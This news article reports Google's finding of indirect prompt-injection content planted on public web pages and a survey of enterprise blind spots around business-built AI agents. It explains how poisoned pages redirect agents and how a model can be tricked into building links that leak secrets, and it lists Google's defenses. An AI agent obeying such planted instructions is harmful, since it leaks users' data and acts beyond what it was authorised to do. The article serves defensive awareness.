Google warns web pages poison agents

A prompt is an instruction for an artificial intelligence model. An indirect prompt injection hides that instruction inside a web page, email, or document an agent reads later. (support.google.com) (knowledge.workspace.google.com) Google’s Threat Intelligence teams said April 23 that they found indirect prompt injection patterns on the public web after scanning Common Crawl, a repository with monthly snapshots of 2 billion to 3 billion pages. (security.googleblog.com) The basic risk is simple: an agent opens a poisoned page, follows the hidden instruction instead of the user’s request, and can reveal internal data or take an unauthorized action. Google’s examples include a chatbot exposing sensitive information and a summarizer sending an email it was never supposed to send. (knowledge.workspace.google.com) Google said the public web is an easy place for attackers to seed these instructions because agents increasingly browse websites as part of their work. The company described indirect prompt injection as a top-priority attack path for systems that can read content and act on a user’s behalf. (security.googleblog.com) (cloud.google.com) The warning lands as enterprises are handing more work to business users, not just software teams. Nokod said April 27 that a survey of 200 chief information security officers found 80% of security teams lack full visibility into these assets, and most can track only 44% of the artificial intelligence tools handling sensitive company and user data. (prnewswire.com) Nokod said business users now outnumber professional developers by an average of 4 to 1 in the organizations surveyed, and by as much as 10 to 1 in some companies. It named Microsoft Copilot Studio, ServiceNow, Power Automate, and UiPath as platforms driving that spread of business-built agents and automations. (prnewswire.com) Google has been building defenses around the problem rather than claiming it is solved. Its published mitigations include prompt-injection classifiers, markdown sanitization, suspicious URL redaction, user-confirmation steps, and a system it calls URL provenance to block links generated at runtime for data theft. (knowledge.workspace.google.com) (bughunters.google.com) Google’s Bug Hunters team described URL-based exfiltration as a common prompt-injection technique because a model can be tricked into building a link that carries a secret in its parameters. The team said defenders can break the attack chain by blocking the prompt, the secret, or the exfiltration path. (bughunters.google.com) The thread running through both reports is that agent security now depends on two moving parts at once: what the agent reads from the open web and whether a company even knows the agent exists. Google is mapping the first problem in public data; Nokod is measuring the second inside the enterprise. (security.googleblog.com) (prnewswire.com) That leaves a narrow operational question for companies adopting agents in 2026: which pages can an agent read, which tools can it call, and who approves the automations business users are already shipping. (security.googleblog.com) (prnewswire.com)